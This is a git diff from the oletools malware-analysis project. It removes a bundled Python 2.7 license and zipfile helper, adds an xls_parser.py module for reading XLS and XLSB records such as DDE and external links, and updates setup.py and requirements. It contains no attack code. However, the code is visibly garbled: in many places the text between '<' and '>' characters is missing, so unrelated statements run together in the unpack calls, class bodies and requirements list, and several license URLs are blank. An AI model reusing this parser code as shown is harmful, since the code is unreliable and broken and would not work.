+PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
+EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGES.
+
+ 17. Interpretation of Sections 15 and 16.
+
+ If the disclaimer of warranty and limitation of liability provided
+above cannot be given local legal effect according to their terms,
+reviewing courts shall apply local law that most closely approximates
+an absolute waiver of all civil liability in connection with the
+Program, unless a warranty or assumption of liability accompanies a
+copy of the Program in return for a fee.
+
+ END OF TERMS AND CONDITIONS
+
+ How to Apply These Terms to Your New Programs
+
+ If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+ To do so, attach the following notices to the program. It is safest
+to attach them to the start of each source file to most effectively
+state the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+
+ Copyright (C)
+
+ This program is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program. If not, see .
+
+Also add information on how to contact you by electronic and paper mail.
+
+ If the program does terminal interaction, make it output a short
+notice like this when it starts in an interactive mode:
+
+ Copyright (C)
+ This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+ This is free software, and you are welcome to redistribute it
+ under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License. Of course, your program's commands
+might be different; for a GUI interface, you would use an "about box".
+
+ You should also get your employer (if you work as a programmer) or school,
+if any, to sign a "copyright disclaimer" for the program, if necessary.
+For more information on this, and how to apply and follow the GNU GPL, see
+ .
+
+ The GNU General Public License does not permit incorporating your program
+into proprietary programs. If your program is a subroutine library, you
+may consider it more useful to permit linking proprietary applications with
+the library. If this is what you want to do, use the GNU Lesser General
+Public License instead of this License. But first, please read
+.
\ No newline at end of file
diff --git a/oletools/thirdparty/zipfile27/LICENSE.txt b/oletools/thirdparty/zipfile27/LICENSE.txt
deleted file mode 100644
index 83453eef..00000000
--- a/oletools/thirdparty/zipfile27/LICENSE.txt
+++ /dev/null
@@ -1,275 +0,0 @@
-Python 2.7 license
-
-This is the official license for the Python 2.7 release:
-
-A. HISTORY OF THE SOFTWARE
-==========================
-
-Python was created in the early 1990s by Guido van Rossum at Stichting
-Mathematisch Centrum (CWI, see http://www.cwi.nl) in the Netherlands
-as a successor of a language called ABC. Guido remains Python's
-principal author, although it includes many contributions from others.
-
-In 1995, Guido continued his work on Python at the Corporation for
-National Research Initiatives (CNRI, see http://www.cnri.reston.va.us)
-in Reston, Virginia where he released several versions of the
-software.
-
-In May 2000, Guido and the Python core development team moved to
-BeOpen.com to form the BeOpen PythonLabs team. In October of the same
-year, the PythonLabs team moved to Digital Creations (now Zope
-Corporation, see http://www.zope.com). In 2001, the Python Software
-Foundation (PSF, see http://www.python.org/psf/) was formed, a
-non-profit organization created specifically to own Python-related
-Intellectual Property. Zope Corporation is a sponsoring member of
-the PSF.
-
-All Python releases are Open Source (see http://www.opensource.org for
-the Open Source Definition). Historically, most, but not all, Python
-releases have also been GPL-compatible; the table below summarizes
-the various releases.
-
- Release Derived Year Owner GPL-
- from compatible? (1)
-
- 0.9.0 thru 1.2 1991-1995 CWI yes
- 1.3 thru 1.5.2 1.2 1995-1999 CNRI yes
- 1.6 1.5.2 2000 CNRI no
- 2.0 1.6 2000 BeOpen.com no
- 1.6.1 1.6 2001 CNRI yes (2)
- 2.1 2.0+1.6.1 2001 PSF no
- 2.0.1 2.0+1.6.1 2001 PSF yes
- 2.1.1 2.1+2.0.1 2001 PSF yes
- 2.2 2.1.1 2001 PSF yes
- 2.1.2 2.1.1 2002 PSF yes
- 2.1.3 2.1.2 2002 PSF yes
- 2.2.1 2.2 2002 PSF yes
- 2.2.2 2.2.1 2002 PSF yes
- 2.2.3 2.2.2 2003 PSF yes
- 2.3 2.2.2 2002-2003 PSF yes
- 2.3.1 2.3 2002-2003 PSF yes
- 2.3.2 2.3.1 2002-2003 PSF yes
- 2.3.3 2.3.2 2002-2003 PSF yes
- 2.3.4 2.3.3 2004 PSF yes
- 2.3.5 2.3.4 2005 PSF yes
- 2.4 2.3 2004 PSF yes
- 2.4.1 2.4 2005 PSF yes
- 2.4.2 2.4.1 2005 PSF yes
- 2.4.3 2.4.2 2006 PSF yes
- 2.5 2.4 2006 PSF yes
- 2.7 2.6 2010 PSF yes
-
-Footnotes:
-
-(1) GPL-compatible doesn't mean that we're distributing Python under
- the GPL. All Python licenses, unlike the GPL, let you distribute
- a modified version without making your changes open source. The
- GPL-compatible licenses make it possible to combine Python with
- other software that is released under the GPL; the others don't.
-
-(2) According to Richard Stallman, 1.6.1 is not GPL-compatible,
- because its license has a choice of law clause. According to
- CNRI, however, Stallman's lawyer has told CNRI's lawyer that 1.6.1
- is "not incompatible" with the GPL.
-
-Thanks to the many outside volunteers who have worked under Guido's
-direction to make these releases possible.
-
-
-B. TERMS AND CONDITIONS FOR ACCESSING OR OTHERWISE USING PYTHON
-===============================================================
-
-PYTHON SOFTWARE FOUNDATION LICENSE VERSION 2
---------------------------------------------
-
-1. This LICENSE AGREEMENT is between the Python Software Foundation
-("PSF"), and the Individual or Organization ("Licensee") accessing and
-otherwise using this software ("Python") in source or binary form and
-its associated documentation.
-
-2. Subject to the terms and conditions of this License Agreement, PSF
-hereby grants Licensee a nonexclusive, royalty-free, world-wide
-license to reproduce, analyze, test, perform and/or display publicly,
-prepare derivative works, distribute, and otherwise use Python
-alone or in any derivative version, provided, however, that PSF's
-License Agreement and PSF's notice of copyright, i.e., "Copyright (c)
-2001, 2002, 2003, 2004, 2005, 2006 Python Software Foundation; All Rights
-Reserved" are retained in Python alone or in any derivative version
-prepared by Licensee.
-
-3. In the event Licensee prepares a derivative work that is based on
-or incorporates Python or any part thereof, and wants to make
-the derivative work available to others as provided herein, then
-Licensee hereby agrees to include in any such work a brief summary of
-the changes made to Python.
-
-4. PSF is making Python available to Licensee on an "AS IS"
-basis. PSF MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR
-IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND
-DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS
-FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF PYTHON WILL NOT
-INFRINGE ANY THIRD PARTY RIGHTS.
-
-5. PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON
-FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS
-A RESULT OF MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON,
-OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
-
-6. This License Agreement will automatically terminate upon a material
-breach of its terms and conditions.
-
-7. Nothing in this License Agreement shall be deemed to create any
-relationship of agency, partnership, or joint venture between PSF and
-Licensee. This License Agreement does not grant permission to use PSF
-trademarks or trade name in a trademark sense to endorse or promote
-products or services of Licensee, or any third party.
-
-8. By copying, installing or otherwise using Python, Licensee
-agrees to be bound by the terms and conditions of this License
-Agreement.
-
-
-BEOPEN.COM LICENSE AGREEMENT FOR PYTHON 2.0
--------------------------------------------
-
-BEOPEN PYTHON OPEN SOURCE LICENSE AGREEMENT VERSION 1
-
-1. This LICENSE AGREEMENT is between BeOpen.com ("BeOpen"), having an
-office at 160 Saratoga Avenue, Santa Clara, CA 95051, and the
-Individual or Organization ("Licensee") accessing and otherwise using
-this software in source or binary form and its associated
-documentation ("the Software").
-
-2. Subject to the terms and conditions of this BeOpen Python License
-Agreement, BeOpen hereby grants Licensee a non-exclusive,
-royalty-free, world-wide license to reproduce, analyze, test, perform
-and/or display publicly, prepare derivative works, distribute, and
-otherwise use the Software alone or in any derivative version,
-provided, however, that the BeOpen Python License is retained in the
-Software, alone or in any derivative version prepared by Licensee.
-
-3. BeOpen is making the Software available to Licensee on an "AS IS"
-basis. BEOPEN MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR
-IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, BEOPEN MAKES NO AND
-DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS
-FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF THE SOFTWARE WILL NOT
-INFRINGE ANY THIRD PARTY RIGHTS.
-
-4. BEOPEN SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF THE
-SOFTWARE FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS
-AS A RESULT OF USING, MODIFYING OR DISTRIBUTING THE SOFTWARE, OR ANY
-DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
-
-5. This License Agreement will automatically terminate upon a material
-breach of its terms and conditions.
-
-6. This License Agreement shall be governed by and interpreted in all
-respects by the law of the State of California, excluding conflict of
-law provisions. Nothing in this License Agreement shall be deemed to
-create any relationship of agency, partnership, or joint venture
-between BeOpen and Licensee. This License Agreement does not grant
-permission to use BeOpen trademarks or trade names in a trademark
-sense to endorse or promote products or services of Licensee, or any
-third party. As an exception, the "BeOpen Python" logos available at
-http://www.pythonlabs.com/logos.html may be used according to the
-permissions granted on that web page.
-
-7. By copying, installing or otherwise using the software, Licensee
-agrees to be bound by the terms and conditions of this License
-Agreement.
-
-
-CNRI LICENSE AGREEMENT FOR PYTHON 1.6.1
----------------------------------------
-
-1. This LICENSE AGREEMENT is between the Corporation for National
-Research Initiatives, having an office at 1895 Preston White Drive,
-Reston, VA 20191 ("CNRI"), and the Individual or Organization
-("Licensee") accessing and otherwise using Python 1.6.1 software in
-source or binary form and its associated documentation.
-
-2. Subject to the terms and conditions of this License Agreement, CNRI
-hereby grants Licensee a nonexclusive, royalty-free, world-wide
-license to reproduce, analyze, test, perform and/or display publicly,
-prepare derivative works, distribute, and otherwise use Python 1.6.1
-alone or in any derivative version, provided, however, that CNRI's
-License Agreement and CNRI's notice of copyright, i.e., "Copyright (c)
-1995-2001 Corporation for National Research Initiatives; All Rights
-Reserved" are retained in Python 1.6.1 alone or in any derivative
-version prepared by Licensee. Alternately, in lieu of CNRI's License
-Agreement, Licensee may substitute the following text (omitting the
-quotes): "Python 1.6.1 is made available subject to the terms and
-conditions in CNRI's License Agreement. This Agreement together with
-Python 1.6.1 may be located on the Internet using the following
-unique, persistent identifier (known as a handle): 1895.22/1013. This
-Agreement may also be obtained from a proxy server on the Internet
-using the following URL: http://hdl.handle.net/1895.22/1013".
-
-3. In the event Licensee prepares a derivative work that is based on
-or incorporates Python 1.6.1 or any part thereof, and wants to make
-the derivative work available to others as provided herein, then
-Licensee hereby agrees to include in any such work a brief summary of
-the changes made to Python 1.6.1.
-
-4. CNRI is making Python 1.6.1 available to Licensee on an "AS IS"
-basis. CNRI MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR
-IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, CNRI MAKES NO AND
-DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS
-FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF PYTHON 1.6.1 WILL NOT
-INFRINGE ANY THIRD PARTY RIGHTS.
-
-5. CNRI SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON
-1.6.1 FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS
-A RESULT OF MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 1.6.1,
-OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
-
-6. This License Agreement will automatically terminate upon a material
-breach of its terms and conditions.
-
-7. This License Agreement shall be governed by the federal
-intellectual property law of the United States, including without
-limitation the federal copyright law, and, to the extent such
-U.S. federal law does not apply, by the law of the Commonwealth of
-Virginia, excluding Virginia's conflict of law provisions.
-Notwithstanding the foregoing, with regard to derivative works based
-on Python 1.6.1 that incorporate non-separable material that was
-previously distributed under the GNU General Public License (GPL), the
-law of the Commonwealth of Virginia shall govern this License
-Agreement only as to issues arising under or with respect to
-Paragraphs 4, 5, and 7 of this License Agreement. Nothing in this
-License Agreement shall be deemed to create any relationship of
-agency, partnership, or joint venture between CNRI and Licensee. This
-License Agreement does not grant permission to use CNRI trademarks or
-trade name in a trademark sense to endorse or promote products or
-services of Licensee, or any third party.
-
-8. By clicking on the "ACCEPT" button where indicated, or by copying,
-installing or otherwise using Python 1.6.1, Licensee agrees to be
-bound by the terms and conditions of this License Agreement.
-
- ACCEPT
-
-
-CWI LICENSE AGREEMENT FOR PYTHON 0.9.0 THROUGH 1.2
---------------------------------------------------
-
-Copyright (c) 1991 - 1995, Stichting Mathematisch Centrum Amsterdam,
-The Netherlands. All rights reserved.
-
-Permission to use, copy, modify, and distribute this software and its
-documentation for any purpose and without fee is hereby granted,
-provided that the above copyright notice appear in all copies and that
-both that copyright notice and this permission notice appear in
-supporting documentation, and that the name of Stichting Mathematisch
-Centrum or CWI not be used in advertising or publicity pertaining to
-distribution of the software without specific, written prior
-permission.
-
-STICHTING MATHEMATISCH CENTRUM DISCLAIMS ALL WARRANTIES WITH REGARD TO
-THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
-FITNESS, IN NO EVENT SHALL STICHTING MATHEMATISCH CENTRUM BE LIABLE
-FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
-WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
-ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
-OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
-
diff --git a/oletools/thirdparty/zipfile27/__init__.py b/oletools/thirdparty/zipfile27/__init__.py
deleted file mode 100644
index bbab5a73..00000000
--- a/oletools/thirdparty/zipfile27/__init__.py
+++ /dev/null
@@ -1,35 +0,0 @@
-# Excerpt from the zipfile module from Python 2.7, to enable is_zipfile
-# to check any file object (e.g. in memory), for Python 2.6.
-# is_zipfile in Python 2.6 can only check files on disk.
-
-# This code from Python 2.7 was not modified.
-
-# 2016-09-06 v0.01 PL: - first version
-
-
-from zipfile import _EndRecData
-
-def _check_zipfile(fp):
- try:
- if _EndRecData(fp):
- return True # file has correct magic number
- except IOError:
- pass
- return False
-
-def is_zipfile(filename):
- """Quickly see if a file is a ZIP file by checking the magic number.
-
- The filename argument may be a file or file-like object too.
- """
- result = False
- try:
- if hasattr(filename, "read"):
- result = _check_zipfile(fp=filename)
- else:
- with open(filename, "rb") as fp:
- result = _check_zipfile(fp)
- except IOError:
- pass
- return result
-
diff --git a/oletools/xls_parser.py b/oletools/xls_parser.py
new file mode 100644
index 00000000..2f0bdad4
--- /dev/null
+++ b/oletools/xls_parser.py
@@ -0,0 +1,497 @@
+""" Parse xls up to some point
+
+Read storages, (sub-)streams, records from xls file
+"""
+#
+# === LICENSE ==================================================================
+
+# xls_parser is copyright (c) 2014-2019 Philippe Lagadec (http://www.decalage.info)
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without modification,
+# are permitted provided that the following conditions are met:
+#
+# * Redistributions of source code must retain the above copyright notice, this
+# list of conditions and the following disclaimer.
+# * Redistributions in binary form must reproduce the above copyright notice,
+# this list of conditions and the following disclaimer in the documentation
+# and/or other materials provided with the distribution.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+#------------------------------------------------------------------------------
+# CHANGELOG:
+# 2017-11-02 v0.1 CH: - first version
+# 2017-11-02 v0.2 CH: - move some code to record_base.py
+# (to avoid copy-and-paste in ppt_parser.py)
+# 2019-01-30 v0.54 PL: - fixed import to avoid mixing installed oletools
+# and dev version
+
+__version__ = '0.54'
+
+# -----------------------------------------------------------------------------
+# TODO:
+# - parse more record types (ExternName, ...)
+# - check what bad stuff can be in other storages: Embedded ("MBD..."), Linked
+# ("LNK..."), "MsoDataStore" and OleStream ('\001Ole')
+#
+# -----------------------------------------------------------------------------
+# REFERENCES:
+# - [MS-XLS]: Excel Binary File Format (.xls) Structure Specification
+# https://msdn.microsoft.com/en-us/library/office/cc313154(v=office.14).aspx
+# - Understanding the Excel .xls Binary File Format
+# https://msdn.microsoft.com/en-us/library/office/gg615597(v=office.14).aspx
+#
+# -- IMPORTS ------------------------------------------------------------------
+
+import sys
+import os.path
+from struct import unpack
+import logging
+
+# little hack to allow absolute imports even if oletools is not installed.
+# Copied from olevba.py
+PARENT_DIR = os.path.normpath(os.path.dirname(os.path.dirname(
+ os.path.abspath(__file__))))
+if PARENT_DIR not in sys.path:
+ sys.path.insert(0, PARENT_DIR)
+del PARENT_DIR
+from oletools import record_base
+
+
+# === PYTHON 2+3 SUPPORT ======================================================
+
+if sys.version_info[0] >= 3:
+ unichr = chr
+
+###############################################################################
+# Helpers
+###############################################################################
+
+
+def is_xls(filename):
+ """
+ determine whether a given file is an excel ole file
+
+ returns True if given file is an ole file and contains a Workbook stream
+
+ todo: could further check that workbook stream starts with a globals
+ substream.
+ See also: oleid.OleID.check_excel
+ """
+ xls_file = None
+ try:
+ xls_file = XlsFile(filename)
+ for stream in xls_file.iter_streams():
+ if isinstance(stream, WorkbookStream):
+ return True
+ except Exception:
+ logging.debug('Ignoring exception in is_xls, assume is not xls',
+ exc_info=True)
+ finally:
+ if xls_file is not None:
+ xls_file.close()
+ return False
+
+
+def read_unicode(data, start_idx, n_chars):
+ """ read a unicode string from a XLUnicodeStringNoCch structure """
+ # first bit 0x0 --> only low-bytes are saved, all high bytes are 0
+ # first bit 0x1 --> 2 bytes per character
+ low_bytes_only = (ord(data[start_idx:start_idx+1]) == 0)
+ if low_bytes_only:
+ end_idx = start_idx + 1 + n_chars
+ return data[start_idx+1:end_idx].decode('ascii'), end_idx
+ else:
+ return read_unicode_2byte(data, start_idx+1, n_chars)
+
+
+def read_unicode_2byte(data, start_idx, n_chars):
+ """ read a unicode string with characters encoded by 2 bytes """
+ end_idx = start_idx + n_chars * 2
+ if n_chars < 256: # faster version, long format string for unpack
+ unichars = (unichr(val) for val in
+ unpack('<' + 'H'*n_chars, data[start_idx:end_idx]))
+ else: # slower version but less memory-extensive
+ unichars = (unichr(unpack(' done
+ break
+ return rec_type, rec_size, None
+
+ @classmethod
+ def record_class_for_type(cls, rec_type):
+ """ determine a class for given record type
+
+ returns (clz, force_read)
+ """
+ if rec_type == XlsbBeginSupBook.TYPE:
+ return XlsbBeginSupBook, True
+ else:
+ return XlsbRecord, False
+
+
+###############################################################################
+# RECORDS
+###############################################################################
+
+# records that appear often but do not need their own XlsRecord subclass (yet)
+FREQUENT_RECORDS = dict([
+ ( 156, 'BuiltInFnGroupCount'), # pylint: disable=bad-whitespace
+ (2147, 'BookExt'), # pylint: disable=bad-whitespace
+ ( 442, 'CodeName'), # pylint: disable=bad-whitespace
+ ( 66, 'CodePage'), # pylint: disable=bad-whitespace
+ (4195, 'Dat'), # pylint: disable=bad-whitespace
+ (2154, 'DataLabExt'), # pylint: disable=bad-whitespace
+ (2155, 'DataLabExtContents'), # pylint: disable=bad-whitespace
+ ( 215, 'DBCell'), # pylint: disable=bad-whitespace
+ ( 220, 'DbOrParmQry'), # pylint: disable=bad-whitespace
+ (2051, 'DBQueryExt'), # pylint: disable=bad-whitespace
+ (2166, 'DConn'), # pylint: disable=bad-whitespace
+ ( 35, 'ExternName'), # pylint: disable=bad-whitespace
+ ( 23, 'ExternSheet'), # pylint: disable=bad-whitespace
+ ( 255, 'ExtSST'), # pylint: disable=bad-whitespace
+ (2052, 'ExtString'), # pylint: disable=bad-whitespace
+ (2151, 'FeatHdr'), # pylint: disable=bad-whitespace
+ ( 91, 'FileSharing'), # pylint: disable=bad-whitespace
+ (1054, 'Format'), # pylint: disable=bad-whitespace
+ ( 49, 'Font'), # pylint: disable=bad-whitespace
+ (2199, 'GUIDTypeLib'), # pylint: disable=bad-whitespace
+ ( 440, 'HLink'), # pylint: disable=bad-whitespace
+ ( 225, 'InterfaceHdr'), # pylint: disable=bad-whitespace
+ ( 226, 'InterfaceEnd'), # pylint: disable=bad-whitespace
+ ( 523, 'Index'), # pylint: disable=bad-whitespace
+ ( 24, 'Lbl'), # pylint: disable=bad-whitespace
+ ( 193, 'Mms'), # pylint: disable=bad-whitespace
+ ( 93, 'Obj'), # pylint: disable=bad-whitespace
+ (4135, 'ObjectLink'), # pylint: disable=bad-whitespace
+ (2058, 'OleDbConn'), # pylint: disable=bad-whitespace
+ ( 222, 'OleObjectSize'), # pylint: disable=bad-whitespace
+ (2214, 'RichTextStream'), # pylint: disable=bad-whitespace
+ (2146, 'SheetExt'), # pylint: disable=bad-whitespace
+ (1212, 'ShrFmla'), # pylint: disable=bad-whitespace
+ (2060, 'SxViewExt'), # pylint: disable=bad-whitespace
+ (2136, 'SxViewLink'), # pylint: disable=bad-whitespace
+ (2049, 'WebPub'), # pylint: disable=bad-whitespace
+ ( 224, 'XF (formatting)'), # pylint: disable=bad-whitespace
+ (2173, 'XFExt (formatting)'), # pylint: disable=bad-whitespace
+ ( 659, 'Style'), # pylint: disable=bad-whitespace
+ (2194, 'StyleExt') # pylint: disable=bad-whitespace
+])
+
+#: records found in xlsb binary parts
+FREQUENT_RECORDS_XLSB = dict([
+ (588, 'BrtEndSupBook'),
+ (667, 'BrtSupAddin'),
+ (355, 'BrtSupBookSrc'),
+ (586, 'BrtSupNameBits'),
+ (584, 'BrtSupNameBool'),
+ (587, 'BrtSupNameEnd'),
+ (581, 'BrtSupNameErr'),
+ (585, 'BrtSupNameFmla'),
+ (583, 'BrtSupNameNil'),
+ (580, 'BrtSupNameNum'),
+ (582, 'BrtSupNameSt'),
+ (577, 'BrtSupNameStart'),
+ (579, 'BrtSupNameValueEnd'),
+ (578, 'BrtSupNameValueStart'),
+ (358, 'BrtSupSame'),
+ (357, 'BrtSupSelf'),
+ (359, 'BrtSupTabs'),
+])
+
+
+class XlsRecord(record_base.OleRecordBase):
+ """ basic building block of data in workbook stream """
+
+ #: max size of a record in xls stream (does not apply to xlsb)
+ MAX_SIZE = 8224
+
+ def _type_str(self):
+ """ simplification for subclasses to create their own __str__ """
+ try:
+ return FREQUENT_RECORDS[self.type]
+ except KeyError:
+ return 'XlsRecord type {0}'.format(self.type)
+
+
+class XlsRecordBof(XlsRecord):
+ """ record found at beginning of substreams """
+ TYPE = 2057
+ SIZE = 16
+ # types of substreams
+ DOCTYPES = dict([(0x5, 'workbook'), (0x10, 'dialog/worksheet'),
+ (0x20, 'chart'), (0x40, 'macro')])
+
+ def finish_constructing(self, _):
+ if self.data is None:
+ self.doctype = None
+ return
+ # parse data (only doctype, ignore rest)
+ self.doctype = unpack('= 4)'
+ .format(self.size))
+ self.ctab, self.cch = unpack(' 0 and self.virt_path:
+ self.support_link_type = self.LINK_TYPE_EXTERNAL
+
+ def _type_str(self):
+ return 'SupBook Record ({0})'.format(self.support_link_type)
+
+
+class XlsbRecord(record_base.OleRecordBase):
+ """ like an xls record, but from binary part of xlsb file
+
+ has no MAX_SIZE and types have different meanings
+ """
+
+ MAX_SIZE = None
+
+ def _type_str(self):
+ """ simplification for subclasses to create their own __str__ """
+ try:
+ return FREQUENT_RECORDS_XLSB[self.type]
+ except KeyError:
+ return 'XlsbRecord type {0}'.format(self.type)
+
+
+class XlsbBeginSupBook(XlsbRecord):
+ """ Record beginning an external link in xlsb file
+
+ contains information about the link itself (e.g. for DDE the link is
+ string1 + ' ' + string2)
+ """
+
+ TYPE = 360
+ LINK_TYPE_WORKBOOK = 'workbook'
+ LINK_TYPE_DDE = 'DDE'
+ LINK_TYPE_OLE = 'OLE'
+ LINK_TYPE_UNEXPECTED = 'unexpected'
+ LINK_TYPE_UNKNOWN = 'unknown'
+
+ def finish_constructing(self, _):
+ self.link_type = self.LINK_TYPE_UNKNOWN
+ self.string1 = ''
+ self.string2 = ''
+ if self.data is None:
+ return
+ self.sbt = unpack('=2.1.0,<3
+olefile>=0.46
+easygui
+colorclass
+msoffcrypto-tool
+pcodedmp>=1.2.5
\ No newline at end of file
diff --git a/setup.py b/setup.py
index 9264cee7..ee6c6e90 100644
--- a/setup.py
+++ b/setup.py
@@ -23,6 +23,16 @@
# 2016-09-05 PL: - added more entry points
# 2017-01-18 v0.51 PL: - added package zipfile27 (issue #121)
# 2017-10-18 v0.52 PL: - added msodde
+# 2018-03-19 v0.52.3 PL: - added install_requires, removed thirdparty.pyparsing
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
+# 2018-09-15 PL: - easygui is now a dependency
+# 2018-09-22 PL: - colorclass is now a dependency
+# 2018-10-27 PL: - fixed issue #359 (bug when importing log_helper)
+# 2019-02-26 CH: - add optional dependency msoffcrypto for decryption
+# 2019-05-22 PL: - 'msoffcrypto-tool' is now a required dependency
+# 2019-05-23 v0.55 PL: - added pcodedmp as dependency
+# 2019-09-24 PL: - removed oletools.thirdparty.DridexUrlDecoder
+# 2019-11-10 PL: - changed pyparsing from 2.2.0 to 2.1.0 for issue #481
#--- TODO ---------------------------------------------------------------------
@@ -42,7 +52,7 @@
#--- METADATA -----------------------------------------------------------------
name = "oletools"
-version = '0.52dev2'
+version = '0.56dev6'
desc = "Python tools to analyze security characteristics of MS Office and OLE files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), for Malware Analysis and Incident Response #DFIR"
long_desc = open('oletools/README.rst').read()
author = "Philippe Lagadec"
@@ -51,7 +61,7 @@
license = "BSD"
download_url = "https://github.com/decalage2/oletools/releases"
-# see https://pypi.python.org/pypi?%3Aaction=list_classifiers
+# see https://pypi.org/pypi?%3Aaction=list_classifiers
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
@@ -63,7 +73,13 @@
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
+ "Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
+ "Programming Language :: Python :: 3.4",
+ "Programming Language :: Python :: 3.5",
+ "Programming Language :: Python :: 3.6",
+ "Programming Language :: Python :: 3.7",
+ "Programming Language :: Python :: 3.8",
"Topic :: Security",
"Topic :: Software Development :: Libraries :: Python Modules",
]
@@ -72,17 +88,14 @@
packages=[
"oletools",
+ "oletools.common",
+ "oletools.common.log_helper",
'oletools.thirdparty',
- 'oletools.thirdparty.olefile',
- 'oletools.thirdparty.easygui',
'oletools.thirdparty.xxxswf',
'oletools.thirdparty.prettytable',
'oletools.thirdparty.xglob',
- 'oletools.thirdparty.DridexUrlDecoder',
- 'oletools.thirdparty.pyparsing',
- 'oletools.thirdparty.colorclass',
'oletools.thirdparty.tablestream',
- 'oletools.thirdparty.zipfile27',
+ 'oletools.thirdparty.oledump',
]
##setupdir = '.'
##package_dir={'': setupdir}
@@ -158,16 +171,9 @@ def rglob(top, prefix='', pattern='*'):
+ rglob('oletools/doc', 'doc', '*.md')
+ rglob('oletools/doc', 'doc', '*.png'),
- 'oletools.thirdparty.olefile': [
- 'README.txt',
- 'LICENSE.txt',
- ],
'oletools.thirdparty.xglob': [
'LICENSE.txt',
],
- 'oletools.thirdparty.easygui': [
- 'LICENSE.txt',
- ],
'oletools.thirdparty.xxxswf': [
'LICENSE.txt',
],
@@ -177,15 +183,6 @@ def rglob(top, prefix='', pattern='*'):
'oletools.thirdparty.DridexUrlDecoder': [
'LICENSE.txt',
],
- 'oletools.thirdparty.pyparsing': [
- 'LICENSE', 'README',
- ],
- 'oletools.thirdparty.colorclass': [
- 'LICENSE.txt',
- ],
- 'oletools.thirdparty.zipfile27': [
- 'LICENSE.txt',
- ],
# 'oletools.thirdparty.tablestream': [
# 'LICENSE', 'README',
# ],
@@ -272,6 +269,7 @@ def rglob(top, prefix='', pattern='*'):
'console_scripts': [
'ezhexviewer=oletools.ezhexviewer:main',
'mraptor=oletools.mraptor:main',
+ 'mraptor3=oletools.mraptor3:main',
'olebrowse=oletools.olebrowse:main',
'oledir=oletools.oledir:main',
'oleid=oletools.oleid:main',
@@ -279,10 +277,12 @@ def rglob(top, prefix='', pattern='*'):
'olemeta=oletools.olemeta:main',
'oletimes=oletools.oletimes:main',
'olevba=oletools.olevba:main',
+ 'olevba3=oletools.olevba3:main',
'pyxswf=oletools.pyxswf:main',
